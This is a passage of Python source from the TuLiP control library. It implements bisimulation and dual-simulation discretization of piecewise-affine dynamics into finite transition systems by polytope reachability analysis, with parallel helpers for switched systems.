See Also ======== L{prop2partition.pwa_partition}, L{prop2partition.part2convex} @param part: L{PropPreservingPartition} object @param ssys: L{LtiSysDyn} or L{PwaSysDyn} object @param N: horizon length @param min_cell_volume: the minimum volume of cells in the resulting partition. @param closed_loop: boolean indicating whether the `closed loop` algorithm should be used. default True. @param conservative: if true, force sequence in reachability analysis to stay inside starting cell. If false, safety is ensured by keeping the sequence inside a convexified version of the original proposition preserving cell. @param max_num_poly: maximum number of polytopes in a region to use in reachability analysis. @param use_all_horizon: in closed loop algorithm: if we should look for reachability also in less than N steps. @param trans_length: the number of polytopes allowed to cross in a transition. a value of 1 checks transitions only between neighbors, a value of 2 checks neighbors of neighbors and so on. @param remove_trans: if True, remove found transitions between non-neighbors. 
@param abs_tol: maximum volume for an "empty" polytope @param plotit: plot partitioning as it evolves @type plotit: boolean, default = False @param save_img: save snapshots of partitioning to PDF files, requires plotit=True @type save_img: boolean, default = False @param cont_props: continuous propositions to plot @type cont_props: list of C{Polytope} @param simu_type: if 'bi', use bisimulation partition; if 'dual', use dual-simulation partition @type simu_type: string, default = 'bi' @rtype: L{AbstractPwa} """ if simu_type == 'bi': AbstractPwa = _discretize_bi( part, ssys, N, min_cell_volume, closed_loop, conservative, max_num_poly, use_all_horizon, trans_length, remove_trans, abs_tol, plotit, save_img, cont_props, plot_every) elif simu_type == 'dual': AbstractPwa = _discretize_dual( part, ssys, N, min_cell_volume, closed_loop, conservative, max_num_poly, use_all_horizon, trans_length, remove_trans, abs_tol, plotit, save_img, cont_props, plot_every) else: raise ValueError( 'Unknown simulation type: "{st}"'.format( st=simu_type)) return AbstractPwa def _discretize_bi( part, ssys, N=10, min_cell_volume=0.1, closed_loop=True, conservative=False, max_num_poly=5, use_all_horizon=False, trans_length=1, remove_trans=False, abs_tol=1e-7, plotit=False, save_img=False, cont_props=None, plot_every=1 ): """Refine the partition and establish transitions based on reachability analysis. Use bi-simulation algorithm. Reference ========= 1. U{[NOTM12] <https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>} 2. Wagenmaker, A. J.; Ozay, N. "A Bisimulation-like Algorithm for Abstracting Control Systems." 54th Annual Allerton Conference on CCC 2016 See Also ======== L{prop2partition.pwa_partition}, L{prop2partition.part2convex} @param part: L{PropPreservingPartition} object @param ssys: L{LtiSysDyn} or L{PwaSysDyn} object @param N: horizon length @param min_cell_volume: the minimum volume of cells in the resulting partition. @param closed_loop: boolean indicating whether the `closed loop` algorithm should be used. default True. @param conservative: if true, force sequence in reachability analysis to stay inside starting cell. If false, safety is ensured by keeping the sequence inside a convexified version of the original proposition preserving cell. @param max_num_poly: maximum number of polytopes in a region to use in reachability analysis. @param use_all_horizon: in closed loop algorithm: if we should look for reachability also in less than N steps. @param trans_length: the number of polytopes allowed to cross in a transition. a value of 1 checks transitions only between neighbors, a value of 2 checks neighbors of neighbors and so on. @param remove_trans: if True, remove found transitions between non-neighbors. 
@param abs_tol: maximum volume for an "empty" polytope @param plotit: plot partitioning as it evolves @type plotit: boolean, default = False @param save_img: save snapshots of partitioning to PDF files, requires plotit=True @type save_img: boolean, default = False @param cont_props: continuous propositions to plot @type cont_props: list of C{Polytope} @rtype: L{AbstractPwa} """ start_time = os.times()[0] orig_ppp = part min_cell_volume = (min_cell_volume /np.finfo(np.double).eps *np.finfo(np.double).eps) ispwa = isinstance(ssys, PwaSysDyn) islti = isinstance(ssys, LtiSysDyn) if ispwa: (part, ppp2pwa, part2orig) = pwa_partition(ssys, part) else: part2orig = range(len(part)) # Save original polytopes, require them to be convex if conservative: orig_list = None orig = [0] else: (part, new2old) = part2convex(part) # convexify part2orig = [part2orig[i] for i in new2old] # map new regions to pwa subsystems if ispwa: ppp2pwa = [ppp2pwa[i] for i in new2old] remove_trans = False # already allowed in nonconservative orig_list = [] for poly in part: if len(poly) == 0: orig_list.append(poly.copy()) elif len(poly) == 1: orig_list.append(poly[0].copy()) else: raise Exception("discretize: " "problem in convexification") orig = list(range(len(orig_list))) # Cheby radius of disturbance set # (defined within the loop for pwa systems) if islti: if len(ssys.E) > 0: rd = ssys.Wset.chebR else: rd = 0. # Initialize matrix for pairs to check IJ = part.adj.copy() IJ = IJ.todense() IJ = np.array(IJ) logger.debug("\n Starting IJ: \n" + str(IJ) ) # next line omitted in discretize_overlap IJ = reachable_within(trans_length, IJ, np.array(part.adj.todense()) ) # Initialize output num_regions = len(part) transitions = np.zeros( [num_regions, num_regions], dtype = int ) sol = deepcopy(part.regions) adj = part.adj.copy() adj = adj.todense() adj = np.array(adj) # next 2 lines omitted in discretize_overlap if ispwa: subsys_list = list(ppp2pwa) else: subsys_list = None ss = ssys # init graphics if plotit: try: import matplotlib.pyplot as plt plt.ion() fig, (ax1, ax2) = plt.subplots(1, 2) ax1.axis('scaled') ax2.axis('scaled') file_extension = 'pdf' except: logger.error('failed to import matplotlib') plt = None else: plt = None iter_count = 0 # List of how many "new" regions # have been created for each region # and a list of original number of neighbors #num_new_reg = np.zeros(len(orig_list)) #num_orig_neigh = np.sum(adj, axis=1).flatten() - 1 progress = list() # Do the abstraction while np.sum(IJ) > 0: ind = np.nonzero(IJ) # i,j swapped in discretize_overlap i = ind[1][0] j = ind[0][0] IJ[j, i] = 0 si = sol[i] sj = sol[j] si_tmp = deepcopy(si) sj_tmp = deepcopy(sj) if ispwa: ss = ssys.list_subsys[subsys_list[i]] if len(ss.E) > 0: rd, xd = pc.cheby_ball(ss.Wset) else: rd = 0. 
if conservative: # Don't use trans_set trans_set = None else: # Use original cell as trans_set trans_set = orig_list[orig[i]] S0 = solve_feasible( si, sj, ss, N, closed_loop, use_all_horizon, trans_set, max_num_poly ) msg = '\n Working with partition cells: {i}, {j}'.format(i=i, j=j) logger.info(msg) msg = '\t{i} (#polytopes = {num}), and:\n'.format(i=i, num=len(si)) msg += '\t{j} (#polytopes = {num})\n'.format(j=j, num=len(sj)) if ispwa: msg += '\t with active subsystem: ' msg += '{sys}\n'.format(sys=subsys_list[i]) msg += '\t Computed reachable set S0 with volume: ' msg += '{vol}\n'.format(vol=S0.volume) logger.debug(msg) #logger.debug('si \cap s0') isect = si.intersect(S0) vol1 = isect.volume risect, xi = pc.cheby_ball(isect) #logger.debug('si \ s0') diff = si.diff(S0) vol2 = diff.volume rdiff, xd = pc.cheby_ball(diff) # if pc.is_fulldim(pc.Region([isect]).intersect(diff)): # logging.getLogger('tulip.polytope').setLevel(logging.DEBUG) # diff = pc.mldivide(si, S0, save=True) # # ax = S0.plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/s0.pdf') # # ax = si.plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/si.pdf') # # ax = isect.plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/isect.pdf') # # ax = diff.plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/diff.pdf') # # ax = isect.intersect(diff).plot() # ax.axis([0.0, 1.0, 0.0, 2.0]) # ax.figure.savefig('./img/diff_cap_isect.pdf') # # logger.error('Intersection \cap Difference != \emptyset') # # assert(False) if vol1 <= min_cell_volume: logger.warning('\t too small: si \cap Pre(sj), ' 'so discard intersection') if vol1 <= min_cell_volume and isect: logger.warning('\t discarded non-empty intersection: ' 'consider reducing min_cell_volume') if vol2 <= min_cell_volume: logger.warning('\t too small: si \ Pre(sj), so not reached it') # We don't want our partitions to be smaller than the disturbance set # Could be a problem since cheby radius is calculated for smallest # convex polytope, so if we have a region we might throw away a good # cell. 
if (vol1 > min_cell_volume) and (risect > rd) and \ (vol2 > min_cell_volume) and (rdiff > rd): # Make sure new areas are Regions and add proposition lists if len(isect) == 0: isect = pc.Region([isect], si.props) else: isect.props = si.props.copy() if len(diff) == 0: diff = pc.Region([diff], si.props) else: diff.props = si.props.copy() # replace si by intersection (single state) isect_list = pc.separate(isect) sol[i] = isect_list[0] # cut difference into connected pieces difflist = pc.separate(diff) difflist += isect_list[1:] # n_isect = len(isect_list) -1 num_new = len(difflist) # add each piece, as a new state for region in difflist: sol.append(region) # keep track of PWA subsystems map to new states if ispwa: subsys_list.append(subsys_list[i]) n_cells = len(sol) new_idx = range(n_cells-1, n_cells-num_new-1, -1) """Update transition matrix""" transitions = np.pad(transitions, (0,num_new), 'constant') transitions[i, :] = np.zeros(n_cells) for r in new_idx: #transitions[:, r] = transitions[:, i] # All sets reachable from start are reachable from both part's # except possibly the new part transitions[i, r] = 0 transitions[j, r] = 0 # sol[j] is reachable from intersection of sol[i] and S0 if i != j: transitions[j, i] = 1 # sol[j] is reachable from each piece os S0 \cap sol[i] #for k in range(n_cells-n_isect-2, n_cells): # transitions[j, k] = 1 """Update adjacency matrix""" old_adj = np.nonzero(adj[i, :])[0] # reset new adjacencies adj[i, :] = np.zeros([n_cells -num_new]) adj[:, i] = np.zeros([n_cells -num_new]) adj[i, i] = 1 adj = np.pad(adj, (0, num_new), 'constant') for r in new_idx: adj[i, r] = 1 adj[r, i] = 1 adj[r, r] = 1 if not conservative: orig = np.hstack([orig, orig[i]]) # adjacencies between pieces of isect and diff for r in new_idx: for k in new_idx: if r is k: continue if pc.is_adjacent(sol[r], sol[k]): adj[r, k] = 1 adj[k, r] = 1 msg = '' if logger.getEffectiveLevel() <= logging.DEBUG: msg += '\t\n Adding states {i} and '.format(i=i) for r in new_idx: msg += '{r} and '.format(r=r) msg += '\n' logger.debug(msg) for k in np.setdiff1d(old_adj, [i,n_cells-1]): # Every "old" neighbor must be the neighbor # of at least one of the new if pc.is_adjacent(sol[i], sol[k]): adj[i, k] = 1 adj[k, i] = 1 elif remove_trans and (trans_length == 1): # Actively remove transitions between non-neighbors transitions[i, k] = 0 transitions[k, i] = 0 for r in new_idx: if pc.is_adjacent(sol[r], sol[k]): adj[r, k] = 1 adj[k, r] = 1 elif remove_trans and (trans_length == 1): # Actively remove transitions between non-neighbors transitions[r, k] = 0 transitions[k, r] = 0 """Update IJ matrix""" IJ = np.pad(IJ, (0,num_new), 'constant') adj_k = reachable_within(trans_length, adj, adj) sym_adj_change(IJ, adj_k, transitions, i) for r in new_idx: sym_adj_change(IJ, adj_k, transitions, r) if logger.getEffectiveLevel() <= logging.DEBUG: msg = '\n\n Updated adj: \n{adj}'.format(adj=adj) msg += '\n\n Updated trans: \n{trans}'.format(trans= transitions) msg += '\n\n Updated IJ: \n{IJ}'.format(IJ=IJ) logger.debug(msg) logger.info('Divided region: {i}\n'.format(i=i)) elif vol2 < abs_tol: logger.info('Found: {i} ---> {j}\n'.format(i=i, j=j)) transitions[j,i] = 1 else: if logger.level <= logging.DEBUG: msg = '\t Unreachable: {i} --X--> {j}\n'.format(i=i, j=j) msg += '\t\t diff vol: {vol2}\n'.format(vol2=vol2) msg += '\t\t intersect vol: {vol1}\n'.format(vol1=vol1) logger.debug(msg) else: logger.info('\t unreachable\n') transitions[j,i] = 0 # check to avoid overlapping Regions if debug: tmp_part = PropPreservingPartition( 
domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) assert(tmp_part.is_partition() ) n_cells = len(sol) progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2 progress += [progress_ratio] msg = '\t total # polytopes: {n_cells}\n'.format(n_cells=n_cells) msg += '\t progress ratio: {pr}\n'.format(pr=progress_ratio) logger.info(msg) iter_count += 1 # no plotting ? if not plotit: continue if plt is None or plot_partition is None: continue if iter_count % plot_every != 0: continue tmp_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) # plot pair under reachability check ax2.clear() si_tmp.plot(ax=ax2, color='green') sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5) plot_transition_arrow(si_tmp, sj_tmp, ax2) S0.plot(ax2, color='none', hatch='/', alpha=0.3) fig.canvas.draw() # plot partition ax1.clear() plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23) # plot dynamics ssys.plot(ax1, show_domain=False) # plot hatched continuous propositions part.plot_props(ax1) fig.canvas.draw() # scale view based on domain, # not only the current polytopes si, sj l,u = part.domain.bounding_box ax2.set_xlim(l[0,0], u[0,0]) ax2.set_ylim(l[1,0], u[1,0]) if save_img: fname = 'movie' +str(iter_count).zfill(3) fname += '.' + file_extension fig.savefig(fname, dpi=250) plt.pause(1) new_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) # check completeness of adjacency matrix if debug: tmp_part = deepcopy(new_part) tmp_part.compute_adj() # Generate transition system and add transitions ofts = trs.FTS() adj = sp.lil_matrix(transitions.T) n = adj.shape[0] ofts_states = range(n) ofts.states.add_from(ofts_states) ofts.transitions.add_adj(adj, ofts_states) # Decorate TS with state labels atomic_propositions = set(part.prop_regions) ofts.atomic_propositions.add_from(atomic_propositions) for state, region in zip(ofts_states, sol): state_prop = region.props.copy() ofts.states.add(state, ap=state_prop) param = { 'N':N, 'trans_length':trans_length, 'closed_loop':closed_loop, 'conservative':conservative, 'use_all_horizon':use_all_horizon, 'min_cell_volume':min_cell_volume, 'max_num_poly':max_num_poly } ppp2orig = [part2orig[x] for x in orig] end_time = os.times()[0] msg = 'Total abstraction time: {time}[sec]'.format(time= end_time - start_time) print(msg) logger.info(msg) if save_img and plt is not None: fig, ax = plt.subplots(1, 1) plt.plot(progress) ax.set_xlabel('iteration') ax.set_ylabel('progress ratio') ax.figure.savefig('progress.pdf') return AbstractPwa( ppp=new_part, ts=ofts, ppp2ts=ofts_states, pwa=ssys, pwa_ppp=part, ppp2pwa=orig, ppp2sys=subsys_list, orig_ppp=orig_ppp, ppp2orig=ppp2orig, disc_params=param ) def _discretize_dual( part, ssys, N=10, min_cell_volume=0.1, closed_loop=True, conservative=False, max_num_poly=5, use_all_horizon=False, trans_length=1, remove_trans=False, abs_tol=1e-7, plotit=False, save_img=False, cont_props=None, plot_every=1 ): """Refine the partition and establish transitions based on reachability analysis. Use dual-simulation algorithm. Reference ========= 1. U{[NOTM12] <https://tulip-control.sourceforge.io/doc/bibliography.html#notm12>} 2. Wagenmaker, A. J.; Ozay, N. "A Bisimulation-like Algorithm for Abstracting Control Systems." 
54th Annual Allerton Conference on CCC 2016 See Also ======== L{prop2partition.pwa_partition}, L{prop2partition.part2convex} @param part: L{PropPreservingPartition} object @param ssys: L{LtiSysDyn} or L{PwaSysDyn} object @param N: horizon length @param min_cell_volume: the minimum volume of cells in the resulting partition. @param closed_loop: boolean indicating whether the `closed loop` algorithm should be used. default True. @param conservative: if true, force sequence in reachability analysis to stay inside starting cell. If false, safety is ensured by keeping the sequence inside a convexified version of the original proposition preserving cell. @param max_num_poly: maximum number of polytopes in a region to use in reachability analysis. @param use_all_horizon: in closed loop algorithm: if we should look for reachability also in less than N steps. @param trans_length: the number of polytopes allowed to cross in a transition. a value of 1 checks transitions only between neighbors, a value of 2 checks neighbors of neighbors and so on. @param remove_trans: if True, remove found transitions between non-neighbors. @param abs_tol: maximum volume for an "empty" polytope @param plotit: plot partitioning as it evolves @type plotit: boolean, default = False @param save_img: save snapshots of partitioning to PDF files, requires plotit=True @type save_img: boolean, default = False @param cont_props: continuous propositions to plot @type cont_props: list of C{Polytope} @param simu_type: flag used to choose abstraction algorithm (bisimulation or dual-simulation). @type simu_type: string, 'bi' or 'dual' default = 'bi' @rtype: L{AbstractPwa} """ start_time = os.times()[0] orig_ppp = part min_cell_volume = (min_cell_volume /np.finfo(np.double).eps *np.finfo(np.double).eps) ispwa = isinstance(ssys, PwaSysDyn) islti = isinstance(ssys, LtiSysDyn) if ispwa: (part, ppp2pwa, part2orig) = pwa_partition(ssys, part) else: part2orig = range(len(part)) # Save original polytopes, require them to be convex if conservative: orig_list = None orig = [0] else: (part, new2old) = part2convex(part) # convexify part2orig = [part2orig[i] for i in new2old] # map new regions to pwa subsystems if ispwa: ppp2pwa = [ppp2pwa[i] for i in new2old] remove_trans = False # already allowed in nonconservative orig_list = [] for poly in part: if len(poly) == 0: orig_list.append(poly.copy()) elif len(poly) == 1: orig_list.append(poly[0].copy()) else: raise Exception("discretize: " "problem in convexification") orig = list(range(len(orig_list))) # Cheby radius of disturbance set # (defined within the loop for pwa systems) if islti: if len(ssys.E) > 0: rd = ssys.Wset.chebR else: rd = 0. 
# Initialize matrix for pairs to check IJ = part.adj.copy() IJ = IJ.todense() IJ = np.array(IJ) logger.debug("\n Starting IJ: \n" + str(IJ) ) # next line omitted in discretize_overlap IJ = reachable_within(trans_length, IJ, np.array(part.adj.todense())) # Initialize output num_regions = len(part) transitions = np.zeros( [num_regions, num_regions], dtype = int ) sol = deepcopy(part.regions) adj = part.adj.copy() adj = adj.todense() adj = np.array(adj) # next 2 lines omitted in discretize_overlap if ispwa: subsys_list = list(ppp2pwa) else: subsys_list = None ss = ssys # init graphics if plotit: try: import matplotlib.pyplot as plt plt.ion() fig, (ax1, ax2) = plt.subplots(1, 2) ax1.axis('scaled') ax2.axis('scaled') file_extension = 'pdf' except: logger.error('failed to import matplotlib') plt = None else: plt = None iter_count = 0 # List of how many "new" regions # have been created for each region # and a list of original number of neighbors #num_new_reg = np.zeros(len(orig_list)) #num_orig_neigh = np.sum(adj, axis=1).flatten() - 1 progress = list() # Do the abstraction while np.sum(IJ) > 0: ind = np.nonzero(IJ) # i,j swapped in discretize_overlap i = ind[1][0] j = ind[0][0] IJ[j, i] = 0 si = sol[i] sj = sol[j] si_tmp = deepcopy(si) sj_tmp = deepcopy(sj) #num_new_reg[i] += 1 #print(num_new_reg) if ispwa: ss = ssys.list_subsys[subsys_list[i]] if len(ss.E) > 0: rd, xd = pc.cheby_ball(ss.Wset) else: rd = 0. if conservative: # Don't use trans_set trans_set = None else: # Use original cell as trans_set trans_set = orig_list[orig[i]] S0 = solve_feasible( si, sj, ss, N, closed_loop, use_all_horizon, trans_set, max_num_poly ) msg = '\n Working with partition cells: {i}, {j}'.format(i=i, j=j) logger.info(msg) msg = '\t{i} (#polytopes = {num}), and:\n'.format(i=i, num=len(si)) msg += '\t{j} (#polytopes = {num})\n'.format(j=j, num=len(sj)) if ispwa: msg += '\t with active subsystem: ' msg += '{sys}\n'.format(sys=subsys_list[i]) msg += '\t Computed reachable set S0 with volume: ' msg += '{vol}\n'.format(vol=S0.volume) logger.debug(msg) #logger.debug('si \cap s0') isect = si.intersect(S0) vol1 = isect.volume risect, xi = pc.cheby_ball(isect) #logger.debug('si \ s0') rsi, xd = pc.cheby_ball(si) vol2 = si.volume-vol1 # not accurate. need to check polytope class if vol1 <= min_cell_volume: logger.warning('\t too small: si \cap Pre(sj), ' 'so discard intersection') if vol1 <= min_cell_volume and isect: logger.warning('\t discarded non-empty intersection: ' 'consider reducing min_cell_volume') if vol2 <= min_cell_volume: logger.warning('\t too small: si \ Pre(sj), so not reached it') # indicate if S0 has exists in sol check_isect = False # We don't want our partitions to be smaller than the disturbance set # Could be a problem since cheby radius is calculated for smallest # convex polytope, so if we have a region we might throw away a good # cell. 
if (vol1 > min_cell_volume) and (risect > rd) and \ (vol2 > min_cell_volume) and (rsi > rd): # check if the intersection has existed in current partitions for idx in range(len(sol)): if(sol[idx] == isect): logger.info('Found: {idx} ---> {j} '.format(idx=idx, j=j)) logger.info('intersection exists.\n') transitions[j, idx] = 1 check_isect = True if not check_isect: # Make sure new areas are Regions and add proposition lists if len(isect) == 0: isect = pc.Region([isect], si.props) else: isect.props = si.props.copy() # add intersection in sol isect_list = pc.separate(isect) sol.append(isect_list[0]) n_cells = len(sol) new_idx = n_cells-1 """Update adjacency matrix""" old_adj = np.nonzero(adj[i, :])[0] adj = np.pad(adj, (0, 1), 'constant') # cell i and new_idx are adjacent adj[i, new_idx] = 1 adj[new_idx, i] = 1 adj[new_idx, new_idx] = 1 if not conservative: orig = np.hstack([orig, orig[i]]) msg = '' if logger.getEffectiveLevel() <= logging.DEBUG: msg += '\t\n Adding states {new_idx}\n'.format(new_idx= new_idx) logger.debug(msg) for k in np.setdiff1d(old_adj, [i,n_cells-1]): # Every "old" neighbor must be the neighbor # of at least one of the new if pc.is_adjacent(sol[new_idx], sol[k]): adj[new_idx, k] = 1 adj[k, new_idx] = 1 elif remove_trans and (trans_length == 1): # Actively remove transitions between non-neighbors transitions[new_idx, k] = 0 transitions[k, new_idx] = 0 """Update transition matrix""" transitions = np.pad(transitions, (0,1), 'constant') adj_k = reachable_within(trans_length, adj, adj) # transitions i ---> k for k is neighbor of new_idx should be # kept by new_idx transitions[:, new_idx] = np.multiply(transitions[:, i], adj_k[:, i]) # if j and new_idx are neighbor, then add new_idx ---> j if adj_k[j, new_idx] != 0: transitions[j, new_idx] = 1 """Update IJ matrix""" IJ = np.pad(IJ, (0, 1), 'constant') sym_adj_change(IJ, adj_k, transitions, i) sym_adj_change(IJ, adj_k, transitions, new_idx) if logger.getEffectiveLevel() <= logging.DEBUG: msg = '\n\n Updated adj: \n{adj}'.format(adj=adj) msg += '\n\n Updated trans: \n{trans}'.format(trans= transitions) msg += '\n\n Updated IJ: \n{IJ}'.format(IJ=IJ) logger.debug(msg) logger.info('Divided region: {i}\n'.format(i=i)) elif vol2 < abs_tol: logger.info('Found: {i} ---> {j}\n'.format(i=i, j=j)) transitions[j, i] = 1 else: if logger.level <= logging.DEBUG: msg = '\t Unreachable: {i} --X--> {j}\n'.format(i=i, j=j) msg += '\t\t diff vol: {vol2}\n'.format(vol2=vol2) msg += '\t\t intersect vol: {vol1}\n'.format(vol1=vol1) logger.debug(msg) else: logger.info('\t unreachable\n') transitions[j, i] = 0 # check to avoid overlapping Regions if debug: tmp_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) assert(tmp_part.is_partition() ) n_cells = len(sol) progress_ratio = 1 - float(np.sum(IJ) ) /n_cells**2 progress += [progress_ratio] msg = '\t total # polytopes: {n_cells}\n'.format(n_cells=n_cells) msg += '\t progress ratio: {pr}\n'.format(pr=progress_ratio) logger.info(msg) iter_count += 1 # needs to be removed later # if(iter_count>=700): # break # no plotting ? 
if not plotit: continue if plt is None or plot_partition is None: continue if iter_count % plot_every != 0: continue tmp_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) # plot pair under reachability check ax2.clear() si_tmp.plot(ax=ax2, color='green') sj_tmp.plot(ax2, color='red', hatch='o', alpha=0.5) plot_transition_arrow(si_tmp, sj_tmp, ax2) S0.plot(ax2, color='none', hatch='/', alpha=0.3) fig.canvas.draw() # plot partition ax1.clear() plot_partition(tmp_part, transitions.T, ax=ax1, color_seed=23) # plot dynamics ssys.plot(ax1, show_domain=False) # plot hatched continuous propositions part.plot_props(ax1) fig.canvas.draw() # scale view based on domain, # not only the current polytopes si, sj l,u = part.domain.bounding_box ax2.set_xlim(l[0,0], u[0,0]) ax2.set_ylim(l[1,0], u[1,0]) if save_img: fname = 'movie' +str(iter_count).zfill(3) fname += '.' + file_extension fig.savefig(fname, dpi=250) plt.pause(1) new_part = PropPreservingPartition( domain=part.domain, regions=sol, adj=sp.lil_matrix(adj), prop_regions=part.prop_regions ) # check completeness of adjacency matrix if debug: tmp_part = deepcopy(new_part) tmp_part.compute_adj() # Generate transition system and add transitions ofts = trs.FTS() adj = sp.lil_matrix(transitions.T) n = adj.shape[0] ofts_states = range(n) ofts.states.add_from(ofts_states) ofts.transitions.add_adj(adj, ofts_states) # Decorate TS with state labels atomic_propositions = set(part.prop_regions) ofts.atomic_propositions.add_from(atomic_propositions) for state, region in zip(ofts_states, sol): state_prop = region.props.copy() ofts.states.add(state, ap=state_prop) param = { 'N':N, 'trans_length':trans_length, 'closed_loop':closed_loop, 'conservative':conservative, 'use_all_horizon':use_all_horizon, 'min_cell_volume':min_cell_volume, 'max_num_poly':max_num_poly } ppp2orig = [part2orig[x] for x in orig] end_time = os.times()[0] msg = 'Total abstraction time: ' +\ str(end_time - start_time) + '[sec]' print(msg) logger.info(msg) if save_img and plt is not None: fig, ax = plt.subplots(1, 1) plt.plot(progress) ax.set_xlabel('iteration') ax.set_ylabel('progress ratio') ax.figure.savefig('progress.pdf') return AbstractPwa( ppp=new_part, ts=ofts, ppp2ts=ofts_states, pwa=ssys, pwa_ppp=part, ppp2pwa=orig, ppp2sys=subsys_list, orig_ppp=orig_ppp, ppp2orig=ppp2orig, disc_params=param ) def reachable_within(trans_length, adj_k, adj): """Find cells reachable within trans_length hops. """ if trans_length <= 1: return adj_k k = 1 while k < trans_length: adj_k = (np.dot(adj_k, adj)!=0).astype(int) k += 1 adj_k = (adj_k > 0).astype(int) return adj_k def sym_adj_change(IJ, adj_k, transitions, i): horizontal = adj_k[i, :] -transitions[i, :] > 0 vertical = adj_k[:, i] -transitions[:, i] > 0 IJ[i, :] = horizontal.astype(int) IJ[:, i] = vertical.astype(int) # DEFUNCT until further notice def discretize_overlap(closed_loop=False, conservative=False): """default False. UNDER DEVELOPMENT; function signature may change without notice. Calling will result in NotImplementedError. 
""" raise NotImplementedError # # if rdiff < abs_tol: # logger.info("Transition found") # transitions[i,j] = 1 # # elif (vol1 > min_cell_volume) & (risect > rd) & \ # (num_new_reg[i] <= num_orig_neigh[i]+1): # # # Make sure new cell is Region and add proposition lists # if len(isect) == 0: # isect = pc.Region([isect], si.props) # else: # isect.props = si.props.copy() # # # Add new state # sol.append(isect) # size = len(sol) # # # Add transitions # transitions = np.hstack([transitions, np.zeros([size - 1, 1], # dtype=int) ]) # transitions = np.vstack([transitions, np.zeros([1, size], # dtype=int) ]) # # # All sets reachable from orig cell are reachable from both cells # transitions[size-1,:] = transitions[i,:] # transitions[size-1,j] = 1 # j is reachable from new cell # # # Take care of adjacency # old_adj = np.nonzero(adj[i,:])[0] # # adj = np.hstack([adj, np.zeros([size - 1, 1], dtype=int) ]) # adj = np.vstack([adj, np.zeros([1, size], dtype=int) ]) # adj[i,size-1] = 1 # adj[size-1,i] = 1 # adj[size-1,size-1] = 1 # # for k in np.setdiff1d(old_adj,[i,size-1]): # if pc.is_adjacent(sol[size-1],sol[k],overlap=True): # adj[size-1,k] = 1 # adj[k, size-1] = 1 # else: # # Actively remove (valid) transitions between non-neighbors # transitions[size-1,k] = 0 # transitions[k,size-1] = 0 # # # Assign original proposition cell to new state and update counts # if not conservative: # orig = np.hstack([orig, orig[i]]) # print(num_new_reg) # num_new_reg = np.hstack([num_new_reg, 0]) # num_orig_neigh = np.hstack([num_orig_neigh, np.sum(adj[size-1,:])-1]) # # logger.info("\n Adding state " + str(size-1) + "\n") # # # Just add adjacent cells for checking, # # unless transition already found # IJ = np.hstack([IJ, np.zeros([size - 1, 1], dtype=int) ]) # IJ = np.vstack([IJ, np.zeros([1, size], dtype=int) ]) # horiz2 = adj[size-1,:] - transitions[size-1,:] > 0 # verti2 = adj[:,size-1] - transitions[:,size-1] > 0 # IJ[size-1,:] = horiz2.astype(int) # IJ[:,size-1] = verti2.astype(int) # else: # logger.info("No transition found, intersect vol: " + str(vol1) ) # transitions[i,j] = 0 # # new_part = PropPreservingPartition( # domain=part.domain, # regions=sol, adj=np.array([]), # trans=transitions, prop_regions=part.prop_regions, # original_regions=orig_list, orig=orig) # return new_part def multiproc_discretize(q, mode, ppp, cont_dyn, disc_params): global logger logger = mp.log_to_stderr() name = mp.current_process().name print('Abstracting mode: ' + str(mode) + ', on: ' + str(name)) absys = discretize(ppp, cont_dyn, **disc_params) q.put((mode, absys)) print('Worker: ' + str(name) + 'finished.') def multiproc_get_transitions( q, absys, mode, ssys, params ): global logger logger = mp.log_to_stderr() name = mp.current_process().name print('Merged transitions for mode: ' + str(mode) + ', on: ' + str(name)) trans = get_transitions(absys, mode, ssys, **params) q.put((mode, trans)) print('Worker: ' + str(name) + 'finished.') def multiproc_discretize_switched( ppp, hybrid_sys, disc_params=None, plot=False, show_ts=False, only_adjacent=True ): """Parallel implementation of discretize_switched. Uses the multiprocessing package. 
""" logger.info('parallel discretize_switched started') modes = list(hybrid_sys.modes) mode_nums = hybrid_sys.disc_domain_size q = mp.Queue() mode_args = dict() for mode in modes: cont_dyn = hybrid_sys.dynamics[mode] mode_args[mode] = (q, mode, ppp, cont_dyn, disc_params[mode]) jobs = [mp.Process(target=multiproc_discretize, args=args) for args in mode_args.values()] for job in jobs: job.start() # flush before join: # http://stackoverflow.com/questions/19071529/ abstractions = dict() for job in jobs: mode, absys = q.get() abstractions[mode] = absys for job in jobs: job.join() # merge their domains (merged_abstr, ap_labeling) = merge_partitions(abstractions) n = len(merged_abstr.ppp) logger.info('Merged partition has: ' + str(n) + ', states') # find feasible transitions over merged partition for mode in modes: cont_dyn = hybrid_sys.dynamics[mode] params = disc_params[mode] mode_args[mode] = (q, merged_abstr, mode, cont_dyn, params) jobs = [mp.Process(target=multiproc_get_transitions, args=args) for args in mode_args.values()] for job in jobs: job.start() trans = dict() for job in jobs: mode, t = q.get() trans[mode] = t # merge the abstractions, creating a common TS merge_abstractions(merged_abstr, trans, abstractions, modes, mode_nums) if plot: plot_mode_partitions(merged_abstr, show_ts, only_adjacent) return merged_abstr def discretize_switched( ppp, hybrid_sys, disc_params=None, plot=False, show_ts=False, only_adjacent=True ): """Abstract switched dynamics over given partition. @type ppp: L{PropPreservingPartition} @param hybrid_sys: dynamics of switching modes @type hybrid_sys: L{SwitchedSysDyn} @param disc_params: discretization parameters passed to L{discretize} for each mode. See L{discretize} for details. @type disc_params: dict (keyed by mode) of dicts. @param plot: save partition images @type plot: bool @param show_ts, only_adjacent: options for L{AbstractPwa.plot}. @return: abstracted dynamics, some attributes are dict keyed by mode @rtype: L{AbstractSwitched} """ if disc_params is None: disc_params = {'N':1, 'trans_length':1} logger.info('discretizing hybrid system') modes = list(hybrid_sys.modes) mode_nums = 